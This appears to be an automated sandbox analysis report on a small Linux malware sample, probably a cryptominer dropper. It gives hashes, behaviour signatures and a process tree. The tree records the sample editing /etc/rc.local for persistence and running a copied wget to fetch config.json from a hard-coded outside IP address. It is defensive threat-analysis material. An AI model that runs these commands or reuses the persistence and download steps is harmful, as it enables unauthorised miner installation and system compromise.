Analysis
-
max time kernel
132s -
max time network
148s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-04-2024 17:01
Static task
static1
Behavioral task
behavioral1
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
-
Size
2KB
-
MD5
ea79e6f3a96671aa051f677679c2bda0
-
SHA1
2e2f085e81e8e750da43d8217541404ab78461e9
-
SHA256
f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543
-
SHA512
ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/wget 737 wget -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118 -
Reads CPU attributes 1 TTPs 1 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/16/stat ps File opened for reading /proc/686/cmdline ps File opened for reading /proc/1/cmdline ps File opened for reading /proc/10/stat ps File opened for reading /proc/179/cmdline ps File opened for reading /proc/724/cmdline ps File opened for reading /proc/726/stat ps File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/382/cmdline ps File opened for reading /proc/725/stat ps File opened for reading /proc/726/cmdline ps File opened for reading /proc/1/status ps File opened for reading /proc/709/status ps File opened for reading /proc/686/status ps File opened for reading /proc/19/cmdline ps File opened for reading /proc/37/status ps File opened for reading /proc/680/status ps File opened for reading /proc/724/stat ps File opened for reading /proc/2/status ps File opened for reading /proc/155/stat ps File opened for reading /proc/710/cmdline ps File opened for reading /proc/81/stat ps File opened for reading /proc/369/status ps File opened for reading /proc/388/cmdline ps File opened for reading /proc/679/status ps File opened for reading /proc/74/stat ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/680/stat ps File opened for reading /proc/70/cmdline ps File opened for reading /proc/82/cmdline ps File opened for reading /proc/72/status ps File opened for reading /proc/161/status ps File opened for reading /proc/368/stat ps File opened for reading /proc/726/status ps File opened for reading /proc/11/stat ps File opened for reading /proc/23/cmdline ps File opened for reading /proc/334/status ps File opened for reading /proc/679/stat ps File opened for reading /proc/725/cmdline ps File opened for reading /proc/22/cmdline ps File opened for reading /proc/179/stat ps File opened for reading /proc/82/status ps File opened for reading /proc/704/cmdline ps File opened for reading /proc/687/cmdline ps File opened for reading /proc/filesystems cp File opened for reading /proc/6/status ps File opened for reading /proc/384/status ps File opened for reading /proc/247/status ps File opened for reading /proc/382/status ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/247/stat ps File opened for reading /proc/384/cmdline ps File opened for reading /proc/727/stat ps File opened for reading /proc/9/stat ps File opened for reading /proc/37/stat ps File opened for reading /proc/110/status ps File opened for reading /proc/369/cmdline ps File opened for reading /proc/71/cmdline ps File opened for reading /proc/72/stat ps File opened for reading /proc/81/status ps File opened for reading /proc/704/stat ps File opened for reading /proc/2/stat ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/706/cmdline ps -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wget cp
Processes
-
/tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118/tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes1181⤵
- Modifies rc script
PID:711 -
/bin/cpcp /usr/bin/wget .2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/chmodchmod +x wget2⤵PID:735
-
-
/tmp/wget./wget -P /tmp/ http://103.45.185.68:6358/config.json2⤵
- Executes dropped EXE
PID:737
-
-
/bin/grepgrep /etc/mlwk.sh1⤵PID:716
-
/bin/grepgrep -v grep1⤵PID:717
-
/bin/catcat /etc/rc.local1⤵PID:715
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:724
-
/bin/grepgrep /tmp/xmrig1⤵PID:725
-
/bin/grepgrep -v grep1⤵PID:726
-
/usr/bin/wcwc -l1⤵PID:727
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18B
MD52e5bcdd3b23224ecae22093a9349b20a
SHA1b4a63c6da233638e105eb63db7c2bf6dcf9b11c3
SHA2564157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d
SHA512c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7
-
Filesize
536KB
MD54a7c9f69532775b790e8d999f73a68b9
SHA19cf4d3d57284103e828dcaa514bfa76e84366472
SHA256ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495
SHA512925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128